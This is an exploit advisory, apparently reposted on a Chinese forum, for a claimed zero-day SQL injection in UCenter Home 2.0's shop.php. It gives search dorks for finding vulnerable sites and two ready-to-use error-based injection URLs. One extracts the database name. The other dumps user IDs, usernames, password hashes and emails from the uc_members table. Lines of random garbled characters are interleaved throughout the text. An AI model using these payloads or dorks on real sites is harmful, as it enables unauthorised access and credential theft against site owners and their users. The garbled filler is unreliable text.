) G* A( {4 \) J) v, h
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
1 F8 z; F- }$ b/ r# z& T$ R7 h; b3 ~+ V! }- \4 g$ t, q- E+ v3 M7 W2 P6 P* C( j& _
% R% ], W8 R" X/ _. h) N
" J. s* ]" s" W: V( g
*/ Author : KnocKout
1 a) F8 W: T" {' |7 {# C6 Z0 a1 Z( f) a" y+ D0 u
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
6 q. @- j/ e. ^* | v; {0 B1 N7 U6 K* d- A, M5 R' j& x
*/ Contact: knockoutr@msn.com
# O; S R: | l( \! C, f ^7 M0 X' g8 W) z+ v
*/ Cyber-Warrior.org/CWKnocKout
K4 s6 l& [' A$ x2 V! d
4 x( |# Y4 z% S% x__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' z" K/ f) p" ?
! _. V- g( N8 `5 eScript : UCenter Home 9 \' r3 N0 A1 B6 M3 P" |$ \5 @* k* f
- e5 L( `! i) t4 L
Version : 2.0
. E$ e, y' V. i& Y( P6 {7 Y5 `2 _
( k4 X( ]9 x' c+ w% l$ pScript HomePage : http://u.discuz.net/
& W4 ^% J( ?; U* F( l& I9 L2 Q/ e8 r# d! [' O
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 h: H8 P. F, e) Z( F( X6 L+ q4 G: l5 Q& y
Dork : Powered by UCenter inurl:shop.php?ac=view
7 n- ? E5 k5 C G0 _) c( c, \9 _$ Q+ I1 S: e, s5 ]
Dork 2 : inurl:shop.php?ac=view&shopid= ! v7 r9 U: g2 A3 ~# c) \
) r$ T) b3 J# L2 C__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
$ c* l' q$ |7 b- _0 S' C {! k$ J7 t, \& Y
Vuln file : Shop.php
* d+ f9 Z( |: A u" l/ n) ]1 q; {7 e5 k% T# b( u1 P
value's : (?)ac=view&shopid=
- a% c9 k! c) c" k, f& T
6 i% L5 |/ X3 {: N+ w1 oVulnerable Style : SQL Injection (MySQL Error Based) / r1 W+ P9 d# a' `
( b$ F u( O2 A5 f. G: ~' xNeed Metarials : Hex Conversion $ K- J4 s# g5 f$ ^. w
2 ]2 R% z0 v: ^8 `2 o__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
1 { r C( ~0 a z4 X1 _8 B/ h3 ~: g- A3 A. O
Your Need victim Database name. 7 C- L0 A* S8 k3 B
$ p$ l, u, p1 r& cfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ! g0 Y! P( V9 W" {' b+ l
$ `/ N6 k5 k h1 A$ o8 E6 v
.. 8 q& b( K: d; {' ]
. Z* I0 b* C- y7 a4 H0 H
DB : Okey. ' y; G3 d- `: m& T
: @8 O$ H- K U* hyour edit DB `[TARGET DB NAME]`
: z1 m/ }, b, S8 M( z) o2 O- L- o( a# \8 i& x+ l/ ]+ N/ C
Example : 'hiwir1_ucenter'
5 r+ Q8 ?8 G* G$ `4 t* `! o7 }6 E5 X6 x, ~) W T
Edit : Okey. ( P1 K9 Q- ?8 t
. E! u2 J! i3 ^" G1 u3 \$ I9 ~/ I
Your use Hex conversion. And edit Your SQL Injection Exploit.. 2 E& e- N) D: _. t" G
% e' m: I$ J9 ~' p/ w2 e: G8 d: C
- L8 N. N( q+ K8 P
+ p6 {0 i! w) x8 A2 Z' Q: I, M. Z! GExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 # g2 n9 |$ v# ?" E( j
|
发表于 2013-2-27 21:31:31
收藏
支持
反对